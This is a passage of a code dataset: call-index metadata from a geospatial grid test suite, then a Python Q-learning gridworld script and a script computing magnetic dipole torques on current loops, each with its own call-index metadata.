\n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 6.0, 6.0, \n 7.0, 7.0, 7.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 1.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 1.0, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 4.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, 4.0, 5.0, 5.0], [N, \n 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.0, 8.0, 8.0]]\n )\n', (2797, 3099), True, 'import numpy as np\n'), ((3508, 3818), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, \n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 5.0, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 5.0, 5.0, 5.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, \n 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 2.0, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 5.0, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 5.0, 5.0, 5.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, \n 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 8.0, 8.0, 8.0]]\n )\n', (3516, 3818), True, 'import numpy as np\n'), ((4229, 4539), 'numpy.array', 'np.array', (['[[N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, \n 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.5, 5.0, 5.0], [N, 3.0, 3.0, 4.0, 4.0, \n 4.5, 5.0, 5.0], [N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5], [N, 6.0, 6.0, \n 7.0, 7.0, 7.5, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0]]'], {}), '([[N, 0.0, 0.0, 1.0, 1.0, 1.5, 2.0, 2.0], [N, 0.0, 0.0, 1.0, 1.0, \n 1.5, 2.0, 2.0], [N, 3.0, 3.0, 4.0, 4.0, 4.5, 5.0, 5.0], [N, 3.0, 3.0, \n 4.0, 4.0, 4.5, 5.0, 5.0], [N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5], [N, \n 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0], [N, 6.0, 6.0, 7.0, 7.0, 7.5, 8.0, 8.0]]\n )\n', (4237, 4539), True, 'import numpy as np\n'), ((4929, 5034), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (4936, 5034), False, 'from mapio.geodict import GeoDict\n'), ((5126, 5147), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (5132, 5147), False, 'from mapio.grid2d import Grid2D\n'), ((5918, 5948), 'numpy.array', 'np.array', (['[0.0, 0.5, 2.5, 4.0]'], {}), '([0.0, 0.5, 2.5, 4.0])\n', (5926, 5948), True, 'import numpy as np\n'), ((5959, 5989), 'numpy.array', 'np.array', (['[0.0, 0.5, 2.5, 4.0]'], {}), '([0.0, 0.5, 2.5, 4.0])\n', (5967, 5989), True, 'import numpy as np\n'), ((6024, 6057), 'numpy.array', 'np.array', (['[np.nan, 12, 6, np.nan]'], {}), '([np.nan, 12, 6, np.nan])\n', (6032, 6057), True, 'import numpy as np\n'), ((6116, 6161), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (['value', 'output'], {}), '(value, output)\n', (6146, 6161), True, 'import numpy as np\n'), ((6343, 6448), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 1.0, 'xmax': 5.0, 'ymin': 1.0, 'ymax': 5.0, 'dx': 1.0, 'dy': 1.0,\n 'nx': 5, 'ny': 5}"], {}), "({'xmin': 1.0, 'xmax': 5.0, 'ymin': 1.0, 'ymax': 5.0, 'dx': 1.0,\n 'dy': 1.0, 'nx': 5, 'ny': 5})\n", (6350, 6448), False, 'from mapio.geodict import GeoDict\n'), ((6603, 6623), 'mapio.grid2d.Grid2D', 'Grid2D', (['array', 'gdict'], {}), '(array, gdict)\n', (6609, 6623), False, 'from mapio.grid2d import Grid2D\n'), ((6675, 6695), 'numpy.array', 'np.array', (['[3.0, 4.0]'], {}), '([3.0, 4.0])\n', (6683, 6695), True, 'import numpy as np\n'), ((6706, 6726), 'numpy.array', 'np.array', (['[3.0, 3.0]'], {}), '([3.0, 3.0])\n', (6714, 6726), True, 'import numpy as np\n'), ((6832, 6866), 'numpy.array', 'np.array', (['[[3.0, 4.0], [4.0, 5.0]]'], {}), '([[3.0, 4.0], [4.0, 5.0]])\n', (6840, 6866), True, 'import numpy as np\n'), ((6897, 6931), 'numpy.array', 'np.array', (['[[3.0, 3.0], [4.0, 4.0]]'], {}), '([[3.0, 3.0], [4.0, 4.0]])\n', (6905, 6931), True, 'import numpy as np\n'), ((7091, 7196), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 4.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 5, 'nx': 5}"], {}), "({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 4.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 5, 'nx': 5})\n", (7098, 7196), False, 'from mapio.geodict import GeoDict\n'), ((7310, 7331), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (7316, 7331), False, 'from mapio.grid2d import Grid2D\n'), ((7442, 7470), 'numpy.array', 'np.array', (['[[7, 8], [12, 13]]'], {}), '([[7, 8], [12, 13]])\n', (7450, 7470), True, 'import numpy as np\n'), ((7741, 7845), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -180, 'xmax': 150, 'ymin': -90, 'ymax': 90, 'dx': 30, 'dy': 30,\n 'nx': 12, 'ny': 7}"], {}), "({'xmin': -180, 'xmax': 150, 'ymin': -90, 'ymax': 90, 'dx': 30, 'dy':\n 30, 'nx': 12, 'ny': 7})\n", (7748, 7845), False, 'from mapio.geodict import GeoDict\n'), ((7922, 7943), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (7928, 7943), False, 'from mapio.grid2d import Grid2D\n'), ((7961, 8028), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(-75)', '(45)', '(-45)', '(75)', 'geodict.dx', 'geodict.dy'], {}), '(-75, 45, -45, 75, geodict.dx, geodict.dy)\n', (7986, 8028), False, 'from mapio.geodict import GeoDict\n'), ((8214, 8300), 'numpy.array', 'np.array', (['[[16, 17, 18, 19], [28, 29, 30, 31], [40, 41, 42, 43], [52, 53, 54, 55]]'], {}), '([[16, 17, 18, 19], [28, 29, 30, 31], [40, 41, 42, 43], [52, 53, 54,\n 55]])\n', (8222, 8300), True, 'import numpy as np\n'), ((8541, 8646), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 6.5, 'dx': 1.0, 'dy': 1.0,\n 'nx': 5, 'ny': 7}"], {}), "({'xmin': 0.5, 'xmax': 4.5, 'ymin': 0.5, 'ymax': 6.5, 'dx': 1.0,\n 'dy': 1.0, 'nx': 5, 'ny': 7})\n", (8548, 8646), False, 'from mapio.geodict import GeoDict\n'), ((8784, 8805), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (8790, 8805), False, 'from mapio.grid2d import Grid2D\n'), ((8962, 9010), 'numpy.array', 'np.array', (['[[7, 8], [12, 13], [17, 18], [22, 23]]'], {}), '([[7, 8], [12, 13], [17, 18], [22, 23]])\n', (8970, 9010), True, 'import numpy as np\n'), ((9227, 9332), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5, 'ymax': 6.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 6, 'nx': 7}"], {}), "({'xmin': 0.5, 'xmax': 6.5, 'ymin': 1.5, 'ymax': 6.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 6, 'nx': 7})\n", (9234, 9332), False, 'from mapio.geodict import GeoDict\n'), ((10512, 10563), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(0)', '(10)', '(0)', '(10)', '(0.01)', '(0.01)'], {}), '(0, 10, 0, 10, 0.01, 0.01)\n', (10537, 10563), False, 'from mapio.geodict import GeoDict\n'), ((10575, 10613), 'numpy.random.rand', 'np.random.rand', (['geodict.ny', 'geodict.nx'], {}), '(geodict.ny, geodict.nx)\n', (10589, 10613), True, 'import numpy as np\n'), ((10625, 10646), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (10631, 10646), False, 'from mapio.grid2d import Grid2D\n'), ((10664, 10715), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(2)', '(8)', '(2)', '(8)', '(0.098)', '(0.098)'], {}), '(2, 8, 2, 8, 0.098, 0.098)\n', (10689, 10715), False, 'from mapio.geodict import GeoDict\n'), ((10725, 10736), 'time.time', 'time.time', ([], {}), '()\n', (10734, 10736), False, 'import time\n'), ((10810, 10821), 'time.time', 'time.time', ([], {}), '()\n', (10819, 10821), False, 'import time\n'), ((10890, 10901), 'time.time', 'time.time', ([], {}), '()\n', (10899, 10901), False, 'import time\n'), ((11114, 11219), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (11121, 11219), False, 'from mapio.geodict import GeoDict\n'), ((11886, 11993), 'mapio.grid2d.Grid2D.rasterizeFromGeometry', 'Grid2D.rasterizeFromGeometry', (['shapes', 'geodict'], {'fillValue': '(0)', 'attribute': '"""value"""', 'mustContainCenter': '(False)'}), "(shapes, geodict, fillValue=0, attribute=\n 'value', mustContainCenter=False)\n", (11914, 11993), False, 'from mapio.grid2d import Grid2D\n'), ((12011, 12077), 'numpy.array', 'np.array', (['[[5, 5, 7, 7], [5, 5, 7, 7], [0, 0, 7, 7], [0, 0, 0, 7]]'], {}), '([[5, 5, 7, 7], [5, 5, 7, 7], [0, 0, 7, 7], [0, 0, 0, 7]])\n', (12019, 12077), True, 'import numpy as np\n'), ((12388, 12494), 'mapio.grid2d.Grid2D.rasterizeFromGeometry', 'Grid2D.rasterizeFromGeometry', (['shapes', 'geodict'], {'fillValue': '(0)', 'attribute': '"""value"""', 'mustContainCenter': '(True)'}), "(shapes, geodict, fillValue=0, attribute=\n 'value', mustContainCenter=True)\n", (12416, 12494), False, 'from mapio.grid2d import Grid2D\n'), ((12512, 12578), 'numpy.array', 'np.array', (['[[5, 0, 7, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 0, 0, 0]]'], {}), '([[5, 0, 7, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 0, 0, 0]])\n', (12520, 12578), True, 'import numpy as np\n'), ((12883, 12988), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (12890, 12988), False, 'from mapio.geodict import GeoDict\n'), ((13020, 13041), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (13026, 13041), False, 'from mapio.grid2d import Grid2D\n'), ((13257, 13362), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (13264, 13362), False, 'from mapio.geodict import GeoDict\n'), ((13394, 13415), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (13400, 13415), False, 'from mapio.grid2d import Grid2D\n'), ((13424, 13439), 'numpy.ones', 'np.ones', (['(4, 4)'], {}), '((4, 4))\n', (13431, 13439), True, 'import numpy as np\n'), ((14122, 14225), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -180, 'xmax': 120, 'ymin': -90, 'ymax': 90, 'dx': 60, 'dy': 45,\n 'nx': 6, 'ny': 5}"], {}), "({'xmin': -180, 'xmax': 120, 'ymin': -90, 'ymax': 90, 'dx': 60, 'dy':\n 45, 'nx': 6, 'ny': 5})\n", (14129, 14225), False, 'from mapio.geodict import GeoDict\n'), ((14416, 14457), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample1'], {}), '(normal_dict, sample1)\n', (14435, 14457), False, 'from mapio.grid2d import Grid2D\n'), ((14676, 14717), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample2'], {}), '(normal_dict, sample2)\n', (14695, 14717), False, 'from mapio.grid2d import Grid2D\n'), ((15028, 15069), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample3'], {}), '(normal_dict, sample3)\n', (15047, 15069), False, 'from mapio.grid2d import Grid2D\n'), ((15360, 15401), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample4'], {}), '(normal_dict, sample4)\n', (15379, 15401), False, 'from mapio.grid2d import Grid2D\n'), ((15692, 15733), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample5'], {}), '(normal_dict, sample5)\n', (15711, 15733), False, 'from mapio.grid2d import Grid2D\n'), ((15925, 15978), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(175)', '(-175)', '(-5)', '(5)', '(1.0)', '(1.0)'], {}), '(175, -175, -5, 5, 1.0, 1.0)\n', (15950, 15978), False, 'from mapio.geodict import GeoDict\n'), ((16073, 16091), 'mapio.gdal.GDALGrid', 'GDALGrid', (['data', 'gd'], {}), '(data, gd)\n', (16081, 16091), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((16219, 16239), 'pyproj.Proj', 'pyproj.Proj', (['projstr'], {}), '(projstr)\n', (16230, 16239), False, 'import pyproj\n'), ((16713, 16829), 'numpy.array', 'np.array', (['[[0, 0, 1, 0, 0], [0, 0, 1, 0, 0], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0], [0, 0,\n 1, 0, 0]]'], {'dtype': 'np.int32'}), '([[0, 0, 1, 0, 0], [0, 0, 1, 0, 0], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0\n ], [0, 0, 1, 0, 0]], dtype=np.int32)\n', (16721, 16829), True, 'import numpy as np\n'), ((17040, 17056), 'mapio.geodict.GeoDict', 'GeoDict', (['geodict'], {}), '(geodict)\n', (17047, 17056), False, 'from mapio.geodict import GeoDict\n'), ((17068, 17086), 'mapio.gdal.GDALGrid', 'GDALGrid', (['data', 'gd'], {}), '(data, gd)\n', (17076, 17086), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((6803, 6820), 'numpy.array', 'np.array', (['[13, 8]'], {}), '([13, 8])\n', (6811, 6820), True, 'import numpy as np\n'), ((7028, 7055), 'numpy.array', 'np.array', (['[[13, 8], [9, 4]]'], {}), '([[13, 8], [9, 4]])\n', (7036, 7055), True, 'import numpy as np\n'), ((9527, 9548), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (9533, 9548), False, 'from mapio.grid2d import Grid2D\n'), ((9570, 9675), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 3.0, 'xmax': 4.0, 'ymin': 3.0, 'ymax': 4.0, 'dx': 1.0, 'dy': 1.0,\n 'ny': 2, 'nx': 2}"], {}), "({'xmin': 3.0, 'xmax': 4.0, 'ymin': 3.0, 'ymax': 4.0, 'dx': 1.0,\n 'dy': 1.0, 'ny': 2, 'nx': 2})\n", (9577, 9675), False, 'from mapio.geodict import GeoDict\n'), ((13627, 13642), 'numpy.ones', 'np.ones', (['(5, 5)'], {}), '((5, 5))\n', (13634, 13642), True, 'import numpy as np\n'), ((17253, 17271), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (17269, 17271), False, 'import tempfile\n'), ((17290, 17322), 'os.path.join', 'os.path.join', (['tdir', '"""output.bil"""'], {}), "(tdir, 'output.bil')\n", (17302, 17322), False, 'import os\n'), ((18567, 18586), 'shutil.rmtree', 'shutil.rmtree', (['tdir'], {}), '(tdir)\n', (18580, 18586), False, 'import shutil\n'), ((1144, 1159), 'numpy.arange', 'np.arange', (['(0)', '(4)'], {}), '(0, 4)\n', (1153, 1159), True, 'import numpy as np\n'), ((2199, 2214), 'numpy.arange', 'np.arange', (['(0)', '(9)'], {}), '(0, 9)\n', (2208, 2214), True, 'import numpy as np\n'), ((6300, 6316), 'numpy.arange', 'np.arange', (['(1)', '(26)'], {}), '(1, 26)\n', (6309, 6316), True, 'import numpy as np\n'), ((7227, 7243), 'numpy.arange', 'np.arange', (['(0)', '(25)'], {}), '(0, 25)\n', (7236, 7243), True, 'import numpy as np\n'), ((7695, 7711), 'numpy.arange', 'np.arange', (['(0)', '(84)'], {}), '(0, 84)\n', (7704, 7711), True, 'import numpy as np\n'), ((9363, 9380), 'numpy.arange', 'np.arange', (['(14)', '(56)'], {}), '(14, 56)\n', (9372, 9380), True, 'import numpy as np\n'), ((9941, 9979), 'numpy.array', 'np.array', (['[[30.0, 31.0], [37.0, 38.0]]'], {}), '([[30.0, 31.0], [37.0, 38.0]])\n', (9949, 9979), True, 'import numpy as np\n'), ((11661, 11675), 'shapely.geometry.Polygon', 'Polygon', (['poly1'], {}), '(poly1)\n', (11668, 11675), False, 'from shapely.geometry import MultiPoint, Polygon, mapping\n'), ((11740, 11754), 'shapely.geometry.Polygon', 'Polygon', (['poly2'], {}), '(poly2)\n', (11747, 11754), False, 'from shapely.geometry import MultiPoint, Polygon, mapping\n'), ((16017, 16039), 'numpy.arange', 'np.arange', (['(0.0)', 'ncells'], {}), '(0.0, ncells)\n', (16026, 16039), True, 'import numpy as np\n'), ((17363, 17385), 'rasterio.open', 'rasterio.open', (['outfile'], {}), '(outfile)\n', (17376, 17385), False, 'import rasterio\n'), ((17412, 17427), 'mapio.gdal.get_affine', 'get_affine', (['src'], {}), '(src)\n', (17422, 17427), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((17780, 17869), 'rasterio.warp.calculate_default_transform', 'calculate_default_transform', (['src_crs', 'dst_crs', 'ncols', 'nrows', 'left', 'bottom', 'right', 'top'], {}), '(src_crs, dst_crs, ncols, nrows, left, bottom,\n right, top)\n', (17807, 17869), False, 'from rasterio.warp import reproject, Resampling, calculate_default_transform\n'), ((18105, 18130), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (18113, 18130), True, 'import numpy as np\n'), ((18143, 18334), 'rasterio.warp.reproject', 'reproject', (['data', 'destination'], {'src_transform': 'aff', 'src_crs': 'src_crs', 'dst_transform': 'dst_transform', 'dst_crs': 'dst_crs', 'src_nodata': 'src.nodata', 'dst_nodata': 'np.nan', 'resampling': 'Resampling.nearest'}), '(data, destination, src_transform=aff, src_crs=src_crs,\n dst_transform=dst_transform, dst_crs=dst_crs, src_nodata=src.nodata,\n dst_nodata=np.nan, resampling=Resampling.nearest)\n', (18152, 18334), False, 'from rasterio.warp import reproject, Resampling, calculate_default_transform\n'), ((10034, 10072), 'numpy.array', 'np.array', (['[[34.0, 35.0], [41.0, 42.0]]'], {}), '([[34.0, 35.0], [41.0, 42.0]])\n', (10042, 10072), True, 'import numpy as np\n'), ((5065, 5081), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (5074, 5081), True, 'import numpy as np\n'), ((8723, 8739), 'numpy.arange', 'np.arange', (['(0)', '(35)'], {}), '(0, 35)\n', (8732, 8739), True, 'import numpy as np\n'), ((10122, 10160), 'numpy.array', 'np.array', (['[[34.0, 35.0], [41.0, 42.0]]'], {}), '([[34.0, 35.0], [41.0, 42.0]])\n', (10130, 10160), True, 'import numpy as np\n'), ((12819, 12835), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (12828, 12835), True, 'import numpy as np\n'), ((13193, 13209), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (13202, 13209), True, 'import numpy as np\n'), ((17481, 17486), 'rasterio.crs.CRS', 'CRS', ([], {}), '()\n', (17484, 17486), False, 'from rasterio.crs import CRS\n'), ((17554, 17559), 'rasterio.crs.CRS', 'CRS', ([], {}), '()\n', (17557, 17559), False, 'from rasterio.crs import CRS\n')] |
import numpy as np
from map import Map
from agent import Agent
import matplotlib.pyplot as plt
def decide_action(next_state, episode, q_table):
epsilon = 0.5
#εグリーディ方策
if epsilon <= np.random.uniform(0,1):
next_action = np.argmax(q_table[next_state])
else:
next_action = np.random.choice(range(4))
return next_action
def q_update(q_table, state, action, reward, next_state):
next_q_max = max(q_table[next_state])
gamma = 0.9
alpha = 0.7
q_table[state, action] = (1-alpha)*q_table[state, action] + alpha*(reward + gamma * next_q_max)
return q_table
def reward(end_or_yet, state, next_state, _map):
boko = []
for i in range(_map.shape[0]):
for j in range(_map.shape[1]):
if _map[12-j][i] == 3:
boko.append([12-j,i])
#座標変換
state_ = [state//13,state%13]
next_state_ = [next_state//13,next_state%13]
for boko_ in boko:
if state_ == boko_:
reward = -80
break
else:
reward = 1
if end_or_yet and next_state_ == [11,11]:
reward = 300
elif end_or_yet and next_state_ == [11,2]:
reward = 100
elif end_or_yet and next_state_ == [6,11]:
reward = 20
elif state == next_state:
reward = -10
else:
reward = -1
return reward
def graph(reward_list, max_episode):
episode_list =[]
for i in range(max_episode):
num = i + 1
episode_list.append(num)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(episode_list, reward_list, label="reward_transition")
plt.legend()
plt.show()
def main():
map_init = Map()
agent = Agent()
max_episode = 100
num_step = 300
q_table = np.random.uniform(low=-1, high=1, size=(map_init.size**2, agent.action_space))
reward_list = []
for episode in range(max_episode):
agent = Agent(map_init.init_pos)
state = agent.get_state()
choice_action = np.argmax(q_table[state])
count = 0
#step
for i in range(num_step):
direction = map_init.check_move(agent.pos)
agent.action(choice_action, direction)
end_or_yet = agent.check_done()
next_state = agent.get_state()
get_reward = reward(end_or_yet, state, next_state, map_init.map)
count += get_reward
q_table = q_update(q_table, state, choice_action, get_reward, next_state)
choice_action = decide_action(next_state, episode, q_table)
state = next_state
map_init.plot(agent.pos, q_table)
if end_or_yet:
break
reward_list.append(count)
print("episode %5d, reward %6d, step %5d" %(episode+1,count,i+1))
graph(reward_list, max_episode)
if __name__ == '__main__':
main()
| [
"numpy.random.uniform",
"matplotlib.pyplot.show",
"numpy.argmax",
"matplotlib.pyplot.legend",
"map.Map",
"matplotlib.pyplot.figure",
"agent.Agent"
] | [((1503, 1515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1513, 1515), True, 'import matplotlib.pyplot as plt\n'), ((1617, 1629), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1627, 1629), True, 'import matplotlib.pyplot as plt\n'), ((1634, 1644), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1642, 1644), True, 'import matplotlib.pyplot as plt\n'), ((1674, 1679), 'map.Map', 'Map', ([], {}), '()\n', (1677, 1679), False, 'from map import Map\n'), ((1692, 1699), 'agent.Agent', 'Agent', ([], {}), '()\n', (1697, 1699), False, 'from agent import Agent\n'), ((1755, 1840), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-1)', 'high': '(1)', 'size': '(map_init.size ** 2, agent.action_space)'}), '(low=-1, high=1, size=(map_init.size ** 2, agent.action_space)\n )\n', (1772, 1840), True, 'import numpy as np\n'), ((196, 219), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (213, 219), True, 'import numpy as np\n'), ((242, 272), 'numpy.argmax', 'np.argmax', (['q_table[next_state]'], {}), '(q_table[next_state])\n', (251, 272), True, 'import numpy as np\n'), ((1911, 1935), 'agent.Agent', 'Agent', (['map_init.init_pos'], {}), '(map_init.init_pos)\n', (1916, 1935), False, 'from agent import Agent\n'), ((1994, 2019), 'numpy.argmax', 'np.argmax', (['q_table[state]'], {}), '(q_table[state])\n', (2003, 2019), True, 'import numpy as np\n')] |
#!/Users/robertpoenaru/.pyenv/shims/python
import numpy as np
import matplotlib.pyplot as plt
from numpy import random as rd
N_COILS = 3 # INTEGER NUMBER
RADIUS = 3 # CENTIMETERS
CURRENT = 5 # AMPERES
B_FIELD = 2.5 # TESLA
# ANGLE BETWEEN THE MAGNETIC MOMENT OF THE LOOP AND THE MAGNETIC FIELD B
THETA = 30.0 # RADIANS
def Rad(angle):
return float(angle * np.pi / 180.0)
def Area(radius):
return float(np.power(radius, 2) * np.pi)
# Compute the magnetic moment (magnetic dipole) of the current carrying loop
def MU(PARAMS):
# magnetic moment is directly proportional to the product between the current running through the loop and the enclosing area
r = PARAMS[1] * 0.01
I = PARAMS[2]
N = PARAMS[0]
# the magnetic moment of a single loop
mu_0 = Area(r) * I
# the magnetic moment of the entire coil
mu = N * mu_0
print(f'The magnetic moment is: µ= {mu}')
return mu
# Calculate the torque that is exerted by the magnetic field on the magnetic moment of the loop.
# Torque will start to align the magnetic moment of the loop with the field itself
def T(PARAMS):
B = float(PARAMS[3])
theta = float(Rad(PARAMS[4]))
T = MU(PARAMS) * B * np.sin(theta)
print(f'The torque applied on the current carrying loop is T= {T}')
return T
# Compute the radius of the trajectory of a charged particle moving inside a magnetic field with constant magnitude
def R(MASS, CHARGE, SPEED, B_FIELD):
R = (MASS * SPEED) / (CHARGE * B_FIELD)
print(f'The radius of the particle trajectory is R= {R}')
return R
PARAM_SET = [N_COILS, RADIUS, CURRENT, B_FIELD, THETA]
# print(MU(PARAM_SET))
# print(T(PARAM_SET))
# print(R(1, 1, 1, 1))
interval = np.arange(-120, 120, 2.5)
alphas = list(map(lambda x: x * np.pi / 180.0, interval))
sines = np.sin(alphas)
currents = rd.uniform(1, 5, len(interval))
# areas = list(map(lambda x: 0.30 * x, currents))
AREA = 3.44
dipoles = list(map(lambda I: round(I * AREA, 3), currents))
B_Field = 2.5
torques = [-x * sines[30] * B_Field for x in dipoles]
print(torques)
plt.plot(dipoles, torques, '-r', label='torques')
plt.savefig('torques.pdf', dpi=500, bbox_inches='tight')
plt.close()
angled_torques = [-B_Field * dipoles[0] * sine for sine in sines]
print(angled_torques)
plt.plot(sines, angled_torques, '-r', label='angled-torques')
plt.savefig('angled_torques.pdf', dpi=500, bbox_inches='tight')
plt.close()
| [
"matplotlib.pyplot.plot",
"matplotlib.pyplot.close",
"numpy.power",
"numpy.sin",
"numpy.arange",
"matplotlib.pyplot.savefig"
] | [((1723, 1748), 'numpy.arange', 'np.arange', (['(-120)', '(120)', '(2.5)'], {}), '(-120, 120, 2.5)\n', (1732, 1748), True, 'import numpy as np\n'), ((1817, 1831), 'numpy.sin', 'np.sin', (['alphas'], {}), '(alphas)\n', (1823, 1831), True, 'import numpy as np\n'), ((2085, 2134), 'matplotlib.pyplot.plot', 'plt.plot', (['dipoles', 'torques', '"""-r"""'], {'label': '"""torques"""'}), "(dipoles, torques, '-r', label='torques')\n", (2093, 2134), True, 'import matplotlib.pyplot as plt\n'), ((2135, 2191), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""torques.pdf"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('torques.pdf', dpi=500, bbox_inches='tight')\n", (2146, 2191), True, 'import matplotlib.pyplot as plt\n'), ((2192, 2203), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2201, 2203), True, 'import 